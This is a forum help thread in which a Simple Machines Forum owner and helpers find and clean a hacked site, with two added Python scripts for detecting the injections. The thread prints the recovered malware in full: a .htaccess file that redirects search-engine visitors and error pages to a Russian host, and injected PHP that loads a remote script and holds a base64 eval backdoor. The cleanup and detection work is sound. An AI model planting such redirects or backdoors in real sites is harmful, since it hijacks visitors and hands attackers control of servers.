URGENT - ( yes I have ) BEEN HACKED - NEED HELP

Started by DevinL, January 04, 2012, 05:09:09 PM


DevinL

I think.

Every thing I click on, on my forum is trying to redirect me to:

"http://www.opsofo.com/index.php?PHPSESSID=hikgufeu07mcqo57i09q8fm9s1;wwwRedirect"

I'll worry about how after, but I need to get rid of this ASAP, where is this coming from?
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Illori

that is not hacking, it is a phpsession id added to your url along with a wwwredirect. neither of those is hacking related, your forum is fine.

DevinL

OK thanks. Just so I understand, this is happening how, from my browser?
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Illori

if your browser correctly accepted the cookie the phpsession id should not appear in the address bar.

DevinL

Sorry if I'm pissing people off with my ignorance here. This problem doesn't seem to be browser related. I have tried from 2 different computers now, and from my phone connected over the cell net (not wifi). I'm getting the same thing on all three devices so I don't understand where this is coming from if not from the site.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Illori

it is part of how smf works, it is not related to hacking

DevinL

Ok I get that it's not hacking Illori. I have changed the post title. Can you or someone please tell me where to start looking or working to rectify this problem?
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

MrPhil

If your browser is not configured to accept cookies, you'll get that session ID past the first page or two (once you sign in). If your browser is configured to allow cookies, you may have some sort of configuration problem. Try clearing your browser cache and your SMF-specific cookie(s), and search for other postings discussing this problem (IIRC one solution is to change the cookie name in SMF's configuration in Settings.php).

DevinL

Thank you MrPhil. I have cleared my cookies and checked to make sure it's accepting cookies. This is happening across 3 different devices, so to my way of thinking something has changed on the server side of things. The only thing I changed was to add the google analytics script (which was working fine) and to add the sitemap mod. The forum tested out fine after both those installs.
I'm sure I haven't changed anything else.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

DevinL

Sorry if I'm coming across pissy to you guys, it's not intended to be that way. I'm just very frustrated with this. I'm new to this, and don't have the kind of experience and understanding you guys have.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

Quote from: DevinL on January 04, 2012, 08:06:47 PM
Thank you MrPhil. I have cleared my cookies and checked to make sure it's accepting cookies. This is happening across 3 different devices, so to my way of thinking something has changed on the server side of things. The only thing I changed was to add the google analytics script (which was working fine) and to add the sitemap mod. The forum tested out fine after both those installs.
I'm sure I haven't changed anything else.

looked at your site and imo some kind of javascript conflict with that google analytics mod.

Manually typing in regular url's works fine.
Do you have one of the mods installed that changes url's like Simple SEF or maybe Pretty Url's?
Try disabling/uninstalling it for a test.

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Thank you Underdog. I do have pretty url installed.

I'll pull the google code and see if that helps
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

mashby

I'd uninstall prettyURLs. They aren't doing much for you. The Google code is more valuable.
Always be a little kinder than necessary.
- James M. Barrie

DevinL

Ok, the question then I have now is how? I can't log into my admin panel with the redirect problem. Or am I better to just lose the google code for now, and reinstall after I ditch pretty urls?
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

Quote from: DevinL on January 04, 2012, 08:28:59 PM
Ok, the question then I have now is how? I can't log into my admin panel with the redirect problem. Or am I better to just lose the google code for now, and reinstall after I ditch pretty urls?

Navigate directly to this url: http://www.opsofo.com/index.php?action=admin;area=packages;

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Quote from: -Underdog- on January 04, 2012, 08:33:11 PM
Quote from: DevinL on January 04, 2012, 08:28:59 PM
Ok, the question then I have now is how? I can't log into my admin panel with the redirect problem. Or am I better to just lose the google code for now, and reinstall after I ditch pretty urls?

Navigate directly to this url: http://www.opsofo.com/index.php?action=admin;area=packages;

Thanks I did manage to figure that part out, but I get trapped at the password login. Can I pass login information in the url as well?
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

Quote from: DevinL on January 04, 2012, 08:40:26 PM
Thanks I did manage to figure that part out, but I get trapped at the password login. Can I pass login information in the url as well?

No.
Perhaps the repair settings tool is in order?

Read this: http://docs.simplemachines.org/index.php?topic=663.0

.. or your other option is to use the large upgrade package which will replace all SMF files with defaults.


My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Just remembered, I never got the google code to work, and installed http://custom.simplemachines.org/mods/index.php?mod=2210 to get it going. Could this be the offending party?
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen


Did you manually add some code somewhere?
Like some sort of Bing Analytics script?

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

No I haven't added any code. I did originally add the Google analytics code, but it didn't work properly so I removed it. I know I rechecked that everything was working after I removed the code and everything was fine. The more I think about it, I'm sure it's that mod I used that I mentioned above. I'm sure I forgot to recheck the forums after I installed it. I just remember being happy that Google gave me the thumbs up for being able to do the analytics, and completely forgot to make sure the forums were still functional. Damn it!
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

Quote from: DevinL on January 04, 2012, 09:31:53 PM
No I haven't added any code. I did originally add the Google analytics code, but it didn't work properly so I removed it. I know I rechecked that everything was working after I removed the code and everything was fine. The more I think about it, I'm sure it's that mod I used that I mentioned above. I'm sure I forgot to recheck the forums after I installed it. I just remember being happy that Google gave me the thumbs up for being able to do the analytics, and completely forgot to make sure the forums were still functional. Damn it!

I only asked because your links end up with some broken js script that freezes & 2 links are visible on the blank page, one of them being the bing (ms) search engine.
Anyhow, read the page for the repair settings mod & use it. Then uninstall the mod(s) that you think is causing the issue.

Failing that, use the large upgrade package method (db will remain intact).


My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Thanks Underdog. I'm trying to do that now, but am having trouble getting to the file with the browser. Just keeps redirecting me
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

Quote from: DevinL on January 04, 2012, 10:04:59 PM
Thanks Underdog. I'm trying to do that now, but am having trouble getting to the file with the browser. Just keeps redirecting me

??

I accessed the file without issue but the only thing it accomplished was putting the forum in maintenance mode.
Use the large upgrade package option.


That should revert your forum back to default with your db intact.
All your mods should appear as not being installed in your package manager.

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Thanks man. Yeah I needed to clear my cookies again before I could access the repair file. In the end it didn't do any good as you noted.

I do have a question for you though.

I have gotten word from some members, as well as other people from other forums who were trying to help me, that some of them were redirected to a site in Russia. I'm still not convinced that someone hasn't somehow hacked my site somehow. I get the whole redirect thing, but I doubt SMF is supposed to redirect people to a site in Russia! Any thoughts?
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

DevinL

Special thank you to Underdog for taking the time to try and help me out. I'm glad you and a few others gave a damn and helped out.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

busterone

I can confirm the redirect to a Russian site as well. I was clicking all your menu links to see if anything was wonky on your site and the search button redirected me to the Russian site, upon which some kind of java enabled malware attempted to hijack my computer. Nod32 stopped the malware, but Firefox crashed. I meant to get back here and report it immediately, but had some personal business to take me away from the computer until now. This happened before Underdog stepped in to help, so I can't say if the redirect is still there or not.

DevinL

Thanks busterone. I have confirmed this now from multiple sources as well. I'm sure there are still some people who will refuse to believe it, but this did happen!

I'll try and do a post here with all the information about any mods that were done leading up to this, maybe someone else can figure it out. There IS a problem here somewhere.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

I see your site seems to be working now.

There were 2 redirects on the page. One was for the bing search engine and the other was a Russian site.
Most of the time with Firefox the js just crashed to a white page and viewing the source code I could see the 2 links.
Other times it redirected me to the second url (Russian site).
I actually thought you entered some manual code (malicious?) somewhere for some bing search engine analytics which is why I previously asked about it.

What were all the mods you had installed? Also.. did you download them all from here?


My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Mods that were installed:

Simple portal
Pretty URLs
Sitemap
Pm_informer (though it wasn't working at the time)
Add Domaintools to TrackIP
Aeva Media
Google Analytics Code

No mods were installed from outside this site.
The only code I have installed was the AddThis code.

No other code was installed by me. I had tried to install the google analytics code, but failed and reverted back to a save copy of the file. Hence why I installed the Google mod.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen


I've dug up some recent reports of similar site hijacks ref. http://blog.sucuri.net/2011/08/wordpress-sites-with-htaccess-hacked.html
The reference is regarding WP sites specifically with .htaccess files being rewritten for browser redirects to Russian sites containing malware.
Do you run both SMF and WP from the same domain?

The redirects are still occurring when I purposely alter the url's to reflect how the pretty url's mod would have altered them.

Look for a .htaccess file in your main directory, open it in a text editor & then copy/paste it here in a bbc code box.

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

Chen Zhen

Also the page is redirected when someone accesses your site via google (& probably other search engines).

Another quick ref. (same source) for some info regarding this type of hijack using .htaccess exploits: http://blog.sucuri.net/2011/05/understanding-htaccess-attacks-part-1.html

before you delete the file I would like to see its contents as requested.

Edit -> You can use this online tool to scan your site for malware: http://sitecheck.sucuri.net/scanner/

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Thanks Underdog (again)! I'll get that info to you when I can get to it. In the meantime I did run that scan, and among other things it did find a redirect in a phony 404 error file. I'll look at this more shortly, I had really hoped this was past me now.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

Quote from: DevinL on January 06, 2012, 11:26:21 AM
Thanks Underdog (again)! I'll get that info to you when I can get to it. In the meantime I did run that scan, and among other things it did find a redirect in a phony 404 error file. I'll look at this more shortly, I had really hoped this was past me now.

I am very curious as to how this occurred. I can guess at several possibilities but you are the only one with access to all your files to view them & also access to Cpanel logs which might provide some more info regarding the onset of the hack (<- maybe figure out it occurred after certain actions/installs by you).

You did have mods installed directly related to modifying/creating .htaccess files.
I do not know which FTP platform you use but you may have to go into its options and enable hidden files to see .htaccess files.

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Dude you nailed it!


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://get-byid.ru/ruby/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://get-byid.ru/ruby/index.php [R=301,L]
</IfModule>


After a lot of white space:

ErrorDocument 400 http://get-byid.ru/ruby/index.php
ErrorDocument 401 http://get-byid.ru/ruby/index.php
ErrorDocument 403 http://get-byid.ru/ruby/index.php
ErrorDocument 404 http://get-byid.ru/ruby/index.php
ErrorDocument 500 http://get-byid.ru/ruby/index.php

I also noticed that file was last modified today at 13:33 ( I assume local server time) so it was being accessed while I was completely offline. Permissions are set to 444.

I see I have the option to look at raw access logs, so I'll have a look at them to see if I can find anything out.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE
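The .htaccess pasted above combines two tricks that are easy to miss when skimming a long file: a RewriteCond on HTTP_REFERER that matches search engines and social sites, so only visitors arriving from those referrers are bounced (which is why Chen Zhen saw the redirect from Google but not when typing URLs by hand), and ErrorDocument directives that point error pages at an absolute URL on another host. The following is an added triage script, not code from this thread or from SMF, that reads an .htaccess body and reports both patterns. The sample file, the placeholder host redirect.example.invalid and the helper names are all constructed for the example; the only site-specific value is the forum's own host name, which the script needs in order to tell a legitimate same-site redirect from an off-site one.

```python
"""Flag referer-cloaked redirects and off-site error pages in an .htaccess file.

Added example, not code from the thread or from SMF. It reports RewriteRule
targets on foreign hosts (and whether a RewriteCond on HTTP_REFERER guards
them) and ErrorDocument directives whose target is an absolute URL elsewhere.
"""
import re
from urllib.parse import urlparse

# Constructed sample in the same shape as the file pasted in the thread. The
# redirect host is a placeholder; line 7 and the 404 line are benign controls.
SAMPLE_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|facebook|twitter|yandex)\\.(.*)
RewriteRule ^(.*)$ http://redirect.example.invalid/ruby/index.php [R=301,L]
</IfModule>

RewriteRule ^old-page$ /index.php?topic=1.0 [R=301,L]

ErrorDocument 404 /errors/404.html
ErrorDocument 500 http://redirect.example.invalid/ruby/index.php
"""

REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
ERROR_DOC = re.compile(r"^\s*ErrorDocument\s+(\d{3})\s+(\S+)", re.I)


def external_host(target, own_hosts):
    """Return the host of an absolute URL that is not one of our own hosts, else None."""
    parsed = urlparse(target)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return None  # relative path or local file: not a redirect off the site
    host = parsed.hostname.lower()
    return None if host in own_hosts else host


def audit_htaccess(text, own_hosts):
    """Return (line_no, kind, detail) findings for one .htaccess body."""
    own_hosts = {h.lower() for h in own_hosts}
    findings = []
    pending_referer = None  # RewriteCond on HTTP_REFERER waiting for its RewriteRule
    for no, line in enumerate(text.splitlines(), 1):
        m = REFERER_COND.match(line)
        if m:
            pending_referer = (no, m.group(1))
            continue
        m = REWRITE_RULE.match(line)
        if m:
            host = external_host(m.group(1), own_hosts)
            if host:
                kind = "referer-cloaked redirect" if pending_referer else "external redirect"
                findings.append((no, kind, host))
            pending_referer = None  # a RewriteCond applies only to the next RewriteRule
            continue
        m = ERROR_DOC.match(line)
        if m:
            host = external_host(m.group(2), own_hosts)
            if host:
                findings.append((no, "error page served from foreign host",
                                 f"{m.group(1)} -> {host}"))
    return findings


if __name__ == "__main__":
    for finding in audit_htaccess(SAMPLE_HTACCESS, {"www.opsofo.com", "opsofo.com"}):
        print(finding)
```

Run it against each .htaccess found on the account (including the one in the document root, which is the one that was missed later in the thread); any finding with a foreign host is a file to replace, and the referer list on the matching RewriteCond explains who did and did not see the redirect.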

DevinL

I also found that same file in my root directory with a 444 permission.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen

That is the culprit - some .ru redirects are listed in there.
Delete those .htaccess files & change the actual directory permission to 755.

Change both your mysql & phpmyadmin p/w & then update your Settings.php file to match.
Look for php files that do not belong. Someone could have somehow created a file that allows them to trigger a rewrite of that .htaccess redirect bs and/or other malicious intent.

May I also add that most people get their mysql & phpmyadmin (ftp) login & p/w emailed to them. Consider the fact that your email  p/w may have been compromised so I would suggest to also change that p/w first. Also change your p/w for site login.

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Thanks again Underdog. I'll do all those things you suggest ( I already changed the files). I'll just have to wait for google to crawl again I suppose before I can remedy that redirect.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

Chen Zhen


What was the directory permission for your public_html folder before changing it to 755?
Also note that you have to check all your directory permissions after & including your public_html folder.
A directory permission value further in the tree will override the previous for its contained files/folders.

You need to find the source (most likely a malicious php file) to stop it from reoccurring.
Atm the problem persists.


My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

checking directory permissions I found:

under themes:

All downloaded themes are set to 777. I deleted the ones I'm not using, and reset ADK_Coolblack to 755
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE

DevinL

I started checking files. Found this in a file called "500.php":

<!-- PHP Wrapper - 500 Server Error -->
<html><head><title>500 Server Error</title></head>
<body bgcolor=white>
<h1>500 Server Error</h1>

A misconfiguration on the server caused a hiccup.
Check the server logs, fix the problem, then try again.
<hr>

<?php
global $sessdt_o;
if (!$sessdt_o) {
    $sessdt_o = 1;
    $sessdt_k = "lb11";                    // cookie used to mark visitors already seen
    if (!@$_COOKIE[$sessdt_k]) {
        $sessdt_f = "102";                 // first visit: only plant the marker cookie
        if (!@headers_sent()) { @setcookie($sessdt_k, $sessdt_f); }
        else { echo "<script>document.cookie='" . $sessdt_k . "=" . $sessdt_f . "';</script>"; }
    } else {
        if ($_COOKIE[$sessdt_k] == "102") { // second visit: load off-site script, then bounce back
            $sessdt_f = (rand(1000, 9000) + 1);
            if (!@headers_sent()) { @setcookie($sessdt_k, $sessdt_f); }
            else { echo "<script>document.cookie='" . $sessdt_k . "=" . $sessdt_f . "';</script>"; }
            $sessdt_j = @$_SERVER["HTTP_HOST"] . @$_SERVER["REQUEST_URI"];
            $sessdt_v = urlencode(strrev($sessdt_j));
            $sessdt_u = "http://turnitupnow.net/?rnd=" . $sessdt_f . substr($sessdt_v, -200);
            echo "<script src='$sessdt_u'></script>";
            echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
        }
    }
    $sessdt_p = "showimg";                 // backdoor: a POST field is decoded and eval'd as PHP
    if (isset($_POST[$sessdt_p])) { eval(base64_decode(str_replace(chr(32), chr(43), $_POST[$sessdt_p]))); exit; }
}

echo "URL: http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]<br>\n";
echo `checksuexec`;
?>

</body></html>

Undoubtedly you notice the reference to:

"http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"


I googled it and found all kinds of bad things.

I've deleted it, but would like to hear your thoughts, particularly on the references google found.


Edit: I also found that code in a file called: w32072698w.php
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE
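The code pasted above turned out to be in every PHP file on the account, and earlier in the thread Chen Zhen asked for exactly the two manual checks this automates: look for PHP files that do not belong and check every directory permission below public_html. The following is an added triage script, not code from this thread, from SMF or from the Sucuri scanner. It walks a web root, flags the three patterns visible in the pasted 500.php (a POST field fed to eval(base64_decode(...)), a <meta refresh> bounce, and a <script src="http://..."> tag loaded from another site) and lists directories left world-writable. The signature regexes are my own heuristics, and the demo tree, its file contents and the host example.invalid are constructed for the example.

```python
"""Triage a web root for injected PHP and world-writable directories.

Added example, not code from the thread, from SMF or from the Sucuri scanner.
The signatures are heuristics for the specific injection pasted in the thread;
a real cleanup still compares every file against a known-good SMF release.
"""
import os
import re
import stat
import tempfile

SIGNATURES = [
    ("eval of base64 request data",
     re.compile(r"eval\s*\(\s*base64_decode\s*\(.*?\$_(POST|GET|COOKIE|REQUEST)\b", re.S)),
    ("meta refresh injected",
     re.compile(r"<meta\s+http-equiv=['\"]refresh['\"]", re.I)),
    ("off-site script tag",
     re.compile(r"<script[^>]*\ssrc=['\"]\s*https?://", re.I)),
]


def scan_webroot(root):
    """Return sorted (path relative to root, finding) pairs."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            full = os.path.join(dirpath, d)
            mode = stat.S_IMODE(os.lstat(full).st_mode)
            if mode & stat.S_IWOTH:  # anyone on the box can drop files here (e.g. 777)
                findings.append((os.path.relpath(full, root), "world-writable directory"))
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            for label, rx in SIGNATURES:
                if rx.search(text):
                    findings.append((os.path.relpath(full, root), label))
    return sorted(findings)


# Constructed stand-ins: a cut-down copy of the injected 500.php pattern and a
# harmless file that uses base64_decode without eval, to show it is not flagged.
INJECTED_500 = """<?php global $sessdt_o; if(!$sessdt_o) {
echo "<script src='http://example.invalid/loader.js'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://example.invalid/'><!--";
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;}
} ?>"""
CLEAN_INDEX = "<?php\n// constructed stand-in for a normal forum file\nrequire_once('SSI.php');\necho base64_decode('aGk=');\n"


def build_demo_tree():
    """Create a temporary web root with one infected file and one 777 theme directory."""
    root = tempfile.mkdtemp(prefix="webroot-")
    theme_dir = os.path.join(root, "Themes", "custom")
    os.makedirs(theme_dir, exist_ok=True)
    os.chmod(theme_dir, 0o777)  # mirrors the downloaded themes found set to 777
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(CLEAN_INDEX)
    with open(os.path.join(root, "500.php"), "w") as fh:
        fh.write(INJECTED_500)
    return root


if __name__ == "__main__":
    for path, finding in scan_webroot(build_demo_tree()):
        print(f"{path}: {finding}")
```

Point scan_webroot at the real document root and review each hit by hand; a clean SMF install has no reason to eval request data or to refresh to another host, so those two findings are reliable, while the off-site script tag can also come from a legitimate analytics snippet and needs a look at the surrounding file.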

Chen Zhen

Remove files from public_html directory:

404javascript.js
404testpage4525d2fdc

.. the scan found those as malware. Also look for suspicious code that could have been edited into your index.php file although the upgrade package should have replaced it anew.
Did you contact the host regarding the issue?

My SMF Mods & Plug-Ins

WebDev

"Either you repeat the same conventional doctrines everybody is saying, or else you say something true, and it will sound like it's from Neptune." - Noam Chomsky

DevinL

Turns out that code was in every single php file I had. I've gone through and manually edited it out of all php files, and things seem happy again.

That JavaScript was coming from a redirect in a .htaccess file that was in the root directory. I thought I had checked it, but must have missed it somehow.

I think all is well again, and hopefully it will stay that way.
Proud owner of OPSOFO - the OPen SOurce FOrums
REAL IDEAS FROM REAL PEOPLE FOR REAL PEOPLE
